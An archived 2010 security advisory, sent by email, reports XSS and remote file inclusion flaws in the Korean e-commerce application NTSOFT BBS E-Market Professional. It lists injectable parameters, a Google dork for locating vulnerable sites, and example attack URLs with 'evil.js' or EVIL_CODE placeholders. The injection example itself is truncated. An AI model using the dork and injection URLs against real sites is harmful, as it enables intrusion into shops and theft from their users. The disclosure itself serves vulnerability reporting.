AOH :: HP Unsorted N :: B1A-1412.HTM

NTSOFT BBS E-Market Professional = XSS / Remote Execution Code



NTSOFT BBS E-Market Professional = XSS / Remote Execution Code
NTSOFT BBS E-Market Professional = XSS / Remote Execution Code



------=_20100705090331_41238
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

 Dear Team,

> You can find attached the file, where I have found several bugs on this
> application-
>
> Thank you so much!
>
>
> Ing. Ivan Javier Sanchez
>      Nullcode Project
>
> Email: Ivan.Sanchez@nullcode.com.ar 
> Web Site: http://www.nullcode.com.ar 
> http://ar.linkedin.com/in/nullcode 
>


------=_20100705090331_41238
Content-Type: text/plain; name="NTSOFT BBS E-Market Professional.txt.txt"
Content-Disposition: attachment;
      filename="NTSOFT BBS E-Market Professional.txt.txt"
Content-Transfer-Encoding: quoted-printable

+================================================================================================+
+                 NTSOFT BBS E-Market Professional  & XSS and Remote Execution Evil code         +
+================================================================================================+


Author(s): Ivan Sanchez 

Product:   NTSOFT, All Right Reserved.

Vendor Overview: NTSOFT. (Korean ecommerce application)

Vendor Homepage: http://www.nt.co.kr/ 



Date: 03/07/2010


"most off all korean sites that handle e-shop , e-banking,... use this software"


Description:
------------

BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP.

BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. 
The issue presents itself due to improper validation of user-supplied data. 




During 2009, I reported some bugs:
----------------------------------

http://www.packetstormsecurity.org/0907-exploits/ntsoft-xss.txt 

http://www.securityfocus.com/bid/35893 

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3152 

http://xforce.iss.net/xforce/xfdb/52157 

http://secunia.com/advisories/26117 

http://www.juniper.net/security/auto/vulnerabilities/vuln35893.html 



GOOGLE DORKS:
------------

intext: "NTSOFT All rights reserved"



Parameters affected:

-------------------

2010:

pageurl=   evil.js
co_no=     evil.js
b_temcode= evil.js



2009:

page= evil.js
bt_code= evil.js
b_no= evil.js






Evil Code to put:
-----------------

Example: "> 




Example URl affected:
---------------------


2009:

http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code 



2010:

http://TARGET/becommunity/community/index.php?pageurl= EVIL_CODE 


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=93809&b_no=434&bt_code=17&page=1&flg=3&co_no=EVIL_CODE 


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=19&page=7&flg=EVIL_CODE &co_no=105580 


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=EVIL_CODEE&page=7&flg=3&co_no=105580 





Thank you so Much! Ivan,


NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs! 

+================================================================================================+
+                  NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil code         +
+================================================================================================+

















------=_20100705090331_41238--



The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.